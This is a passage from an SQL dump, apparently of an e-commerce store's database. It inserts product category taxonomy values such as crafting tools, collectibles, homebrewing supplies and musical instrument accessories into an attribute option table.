(401, 401, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Wire > Floral Wire'),
(402, 402, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Crafting Wire > Jewelry & Beading Wire'),
(403, 403, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Embellishments & Trims'),
(404, 404, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Embellishments & Trims > Appliques & Patches'),
(405, 405, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Embellishments & Trims > Beads'),
(406, 406, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Embellishments & Trims > Bows & Yo-Yos'),
(407, 407, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Embellishments & Trims > Decorative Stickers'),
(408, 408, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Embellishments & Trims > Elastic'),
(409, 409, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Embellishments & Trims > Feathers'),
(410, 410, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Embellishments & Trims > Jewelry Findings'),
(411, 411, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Embellishments & Trims > Loose Stones'),
(412, 412, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Embellishments & Trims > Rhinestones & Flatbacks'),
(413, 413, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Embellishments & Trims > Ribbons & Trim'),
(414, 414, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Embellishments & Trims > Sequins & Glitter'),
(415, 415, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Embellishments & Trims > Sew-in Labels'),
(416, 416, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Embossing Powder'),
(417, 417, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Filling & Padding Material'),
(418, 418, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Filling & Padding Material > Batting & Stuffing'),
(419, 419, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Filling & Padding Material > Filling Pellets'),
(420, 420, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Filling & Padding Material > Pillow Forms'),
(421, 421, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Leather & Vinyl'),
(422, 422, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Pottery & Sculpting Materials'),
(423, 423, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Pottery & Sculpting Materials > Clay & Modeling Dough'),
(424, 424, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Pottery & Sculpting Materials > Papier Mache Mixes'),
(425, 425, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Pottery & Sculpting Materials > Plaster Gauze'),
(426, 426, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Pottery & Sculpting Materials > Pottery Slips'),
(427, 427, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Raw Candle Wax'),
(428, 428, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Textiles'),
(429, 429, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Textiles > Crafting Canvas'),
(430, 430, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Textiles > Crafting Canvas > Needlecraft Canvas'),
(431, 431, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Textiles > Crafting Canvas > Painting Canvas'),
(432, 432, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Textiles > Crafting Canvas > Plastic Canvas'),
(433, 433, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Textiles > Fabric'),
(434, 434, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Textiles > Interfacing'),
(435, 435, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Textiles > Printable Fabric'),
(436, 436, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Wick Tabs'),
(437, 437, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Materials > Wicks'),
(438, 438, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tool Accessories'),
(439, 439, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tool Accessories > Craft Knife Blades'),
(440, 440, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tool Accessories > Craft Machine Cases & Covers'),
(441, 441, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tool Accessories > Sewing Machine Extension Tables'),
(442, 442, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tool Accessories > Sewing Machine Feet'),
(443, 443, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tool Accessories > Sewing Machine Replacement Parts'),
(444, 444, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tool Accessories > Spinning Wheel Accessories'),
(445, 445, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tool Accessories > Stamp Blocks'),
(446, 446, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools'),
(447, 447, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Blocking Mats'),
(448, 448, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Blocking Wires'),
(449, 449, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Color Mixing Tools'),
(450, 450, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Color Mixing Tools > Palette Knives'),
(451, 451, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Color Mixing Tools > Palettes'),
(452, 452, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Cutting & Embossing Tools'),
(453, 453, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Cutting & Embossing Tools > Craft & Office Scissors'),
(454, 454, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Cutting & Embossing Tools > Craft Cutters & Embossers'),
(455, 455, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Cutting & Embossing Tools > Craft Knives'),
(456, 456, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Cutting & Embossing Tools > Craft Scoring Tools'),
(457, 457, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Cutting & Embossing Tools > Embossing Heat Tools'),
(458, 458, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Cutting & Embossing Tools > Embossing Pens & Styluses'),
(459, 459, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Cutting & Embossing Tools > Seam Rippers'),
(460, 460, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Cutting & Embossing Tools > Thread & Yarn Cutters'),
(461, 461, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Decoration Makers'),
(462, 462, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Measuring & Marking Tools'),
(463, 463, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Measuring & Marking Tools > Art Brushes'),
(464, 464, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Measuring & Marking Tools > Brayer Rollers'),
(465, 465, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Measuring & Marking Tools > Decorative Stamps'),
(466, 466, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Measuring & Marking Tools > Drafting Compasses'),
(467, 467, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Measuring & Marking Tools > Screen Printing Squeegees'),
(468, 468, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Measuring & Marking Tools > Stencil Machines'),
(469, 469, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Measuring & Marking Tools > Stencils & Die Cuts'),
(470, 470, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Measuring & Marking Tools > Stitch Markers & Counters'),
(471, 471, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Measuring & Marking Tools > Textile Art Gauges & Rulers'),
(472, 472, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Craft Measuring & Marking Tools > Wood Burning Tools'),
(473, 473, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Cutting Mats'),
(474, 474, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Dress Forms'),
(475, 475, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Felting Pads & Mats'),
(476, 476, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Frames, Hoops & Stretchers'),
(477, 477, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Glue Guns'),
(478, 478, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Light Boxes'),
(479, 479, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Needles & Hooks'),
(480, 480, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Needles & Hooks > Crochet Hooks'),
(481, 481, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Needles & Hooks > Hand-Sewing Needles'),
(482, 482, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Needles & Hooks > Knitting Needles'),
(483, 483, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Needles & Hooks > Latch & Locker Hooks'),
(484, 484, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Needles & Hooks > Sewing Machine Needles'),
(485, 485, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Safety Pins'),
(486, 486, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Straight Pins'),
(487, 487, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Textile Craft Machines'),
(488, 488, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Textile Craft Machines > Felting Needles & Machines'),
(489, 489, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Textile Craft Machines > Hand Looms'),
(490, 490, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Textile Craft Machines > Mechanical Looms'),
(491, 491, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Textile Craft Machines > Sewing Machines'),
(492, 492, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Textile Craft Machines > Spinning Wheels'),
(493, 493, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Thimbles & Sewing Palms');
INSERT INTO `eav_attribute_option_value` (`value_id`, `option_id`, `store_id`, `value`) VALUES
(494, 494, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Thread & Yarn Tools'),
(495, 495, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Thread & Yarn Tools > Fiber Cards & Brushes'),
(496, 496, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Thread & Yarn Tools > Hand Spindles'),
(497, 497, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Thread & Yarn Tools > Needle Threaders'),
(498, 498, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Thread & Yarn Tools > Thread & Yarn Guides'),
(499, 499, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Thread & Yarn Tools > Thread & Yarn Spools'),
(500, 500, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Thread & Yarn Tools > Thread, Yarn & Bobbin Winders'),
(501, 501, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Thread & Yarn Tools > Weaving Beaters'),
(502, 502, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Art & Crafting Tools > Thread & Yarn Tools > Weaving Shuttles'),
(503, 503, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Craft Organization'),
(504, 504, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Craft Organization > Needle, Pin & Hook Organizers'),
(505, 505, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Craft Organization > Sewing Baskets & Kits'),
(506, 506, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Craft Organization > Thread & Yarn Organizers'),
(507, 507, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Crafting Patterns & Molds'),
(508, 508, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Crafting Patterns & Molds > Beading Patterns'),
(509, 509, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Crafting Patterns & Molds > Craft Molds'),
(510, 510, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Crafting Patterns & Molds > Felting Molds'),
(511, 511, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Crafting Patterns & Molds > Needlecraft Patterns'),
(512, 512, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Arts & Crafts > Crafting Patterns & Molds > Sewing Patterns'),
(513, 513, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles'),
(514, 514, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Autographs'),
(515, 515, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Collectible Coins & Currency'),
(516, 516, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Collectible Trading Cards'),
(517, 517, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Collectible Weapons'),
(518, 518, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Collectible Weapons > Collectible Guns'),
(519, 519, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Collectible Weapons > Collectible Knives'),
(520, 520, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Collectible Weapons > Collectible Swords'),
(521, 521, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Collectible Weapons > Sword Stands & Displays'),
(522, 522, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Postage Stamps'),
(523, 523, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Rocks & Fossils'),
(524, 524, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Scale Model Accessories'),
(525, 525, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Scale Models'),
(526, 526, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Seal Stamps'),
(527, 527, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles'),
(528, 528, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Autographed Sports Paraphernalia'),
(529, 529, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Autographed Sports Paraphernalia > Auto Racing Autographed Paraphernalia'),
(530, 530, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Autographed Sports Paraphernalia > Baseball & Softball Autographed Paraphernalia'),
(531, 531, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Autographed Sports Paraphernalia > Basketball Autographed Paraphernalia'),
(532, 532, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Autographed Sports Paraphernalia > Boxing Autographed Paraphernalia'),
(533, 533, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Autographed Sports Paraphernalia > Football Autographed Paraphernalia'),
(534, 534, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Autographed Sports Paraphernalia > Hockey Autographed Paraphernalia'),
(535, 535, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Autographed Sports Paraphernalia > Soccer Autographed Paraphernalia'),
(536, 536, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Autographed Sports Paraphernalia > Tennis Autographed Sports Paraphernalia'),
(537, 537, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Sports Fan Accessories'),
(538, 538, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Sports Fan Accessories > Auto Racing Fan Accessories'),
(539, 539, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Sports Fan Accessories > Baseball & Softball Fan Accessories'),
(540, 540, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Sports Fan Accessories > Basketball Fan Accessories'),
(541, 541, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Sports Fan Accessories > Football Fan Accessories'),
(542, 542, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Sports Fan Accessories > Hockey Fan Accessories'),
(543, 543, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Sports Fan Accessories > Soccer Fan Accessories'),
(544, 544, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Sports Collectibles > Sports Fan Accessories > Tennis Fan Accessories'),
(545, 545, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Collectibles > Vintage Advertisements'),
(546, 546, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Homebrewing & Winemaking Supplies'),
(547, 547, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Homebrewing & Winemaking Supplies > Beer Brewing Grains & Malts'),
(548, 548, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Homebrewing & Winemaking Supplies > Bottling Bottles'),
(549, 549, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Homebrewing & Winemaking Supplies > Homebrewing & Winemaking Kits'),
(550, 550, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Homebrewing & Winemaking Supplies > Wine Making'),
(551, 551, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Juggling'),
(552, 552, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Magic & Novelties'),
(553, 553, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Model Making'),
(554, 554, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Model Making > Model Rocketry'),
(555, 555, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Model Making > Model Train Accessories'),
(556, 556, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Model Making > Model Trains & Train Sets'),
(557, 557, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Model Making > Scale Model Kits'),
(558, 558, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories'),
(559, 559, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Brass Instrument Accessories'),
(560, 560, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Brass Instrument Accessories > Brass Instrument Care & Cleaning'),
(561, 561, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Brass Instrument Accessories > Brass Instrument Care & Cleaning > Brass Instrument Care Kits'),
(562, 562, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Brass Instrument Accessories > Brass Instrument Care & Cleaning > Brass Instrument Cleaners & Sanitizers'),
(563, 563, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Brass Instrument Accessories > Brass Instrument Care & Cleaning > Brass Instrument Cleaning Tools'),
(564, 564, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Brass Instrument Accessories > Brass Instrument Care & Cleaning > Brass Instrument Guards'),
(565, 565, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Brass Instrument Accessories > Brass Instrument Care & Cleaning > Brass Instrument Lubricants'),
(566, 566, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Brass Instrument Accessories > Brass Instrument Care & Cleaning > Brass Instrument Polishing Cloths'),
(567, 567, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Brass Instrument Accessories > Brass Instrument Cases & Gigbags'),
(568, 568, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Brass Instrument Accessories > Brass Instrument Mouthpieces'),
(569, 569, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Brass Instrument Accessories > Brass Instrument Mutes'),
(570, 570, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Brass Instrument Accessories > Brass Instrument Replacement Parts'),
(571, 571, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Brass Instrument Accessories > Brass Instrument Straps & Stands'),
(572, 572, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Conductor Batons'),
(573, 573, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Electronic Tuners'),
(574, 574, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Metronomes'),
(575, 575, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Music Benches & Stools'),
(576, 576, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Music Lyres & Flip Folders'),
(577, 577, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Music Stand Accessories'),
(578, 578, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Music Stand Accessories > Music Stand Bags'),
(579, 579, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Music Stand Accessories > Music Stand Lights'),
(580, 580, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Music Stand Accessories > Sheet Music Clips'),
(581, 581, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Music Stands'),
(582, 582, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Musical Instrument Amplifier Accessories'),
(583, 583, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Musical Instrument Amplifier Accessories > Musical Instrument Amplifier Cabinets'),
(584, 584, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Musical Instrument Amplifier Accessories > Musical Instrument Amplifier Covers & Cases'),
(585, 585, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Musical Instrument Amplifier Accessories > Musical Instrument Amplifier Footswitches'),
(586, 586, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Musical Instrument Amplifier Accessories > Musical Instrument Amplifier Knobs'),
(587, 587, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Musical Instrument Amplifier Accessories > Musical Instrument Amplifier Stands'),
(588, 588, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Musical Instrument Amplifier Accessories > Musical Instrument Amplifier Tubes'),
(589, 589, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Musical Instrument Amplifiers'),
(590, 590, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Musical Keyboard Accessories'),
(591, 591, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Musical Keyboard Accessories > Musical Keyboard Bags & Cases'),
(592, 592, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Musical Keyboard Accessories > Musical Keyboard Stands'),
(593, 593, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Musical Keyboard Accessories > Sustain Pedals'),
(594, 594, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories'),
(595, 595, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories > Cymbal & Drum Cases'),
(596, 596, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories > Cymbal & Drum Mutes'),
(597, 597, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories > Drum Heads'),
(598, 598, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories > Drum Keys'),
(599, 599, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories > Drum Kit Hardware'),
(600, 600, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories > Drum Kit Hardware > Bass Drum Beaters'),
(601, 601, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories > Drum Kit Hardware > Drum Kit Mounting Hardware'),
(602, 602, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories > Drum Kit Hardware > Drum Pedals'),
(603, 603, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories > Drum Stick & Brush Accessories'),
(604, 604, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories > Drum Stick & Brush Accessories > Drum Stick & Brush Bags & Holders'),
(605, 605, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories > Drum Sticks & Brushes'),
(606, 606, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories > Electronic Drum Modules'),
(607, 607, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories > Hand Percussion Accessories'),
(608, 608, 0, 'Arts & Entertainment > Hobbies & Creative Arts > Musical Instrument & Orchestra Accessories > Percussion Accessories > Hand Percussion Accessories > Hand Percussion Bags & Cases'),
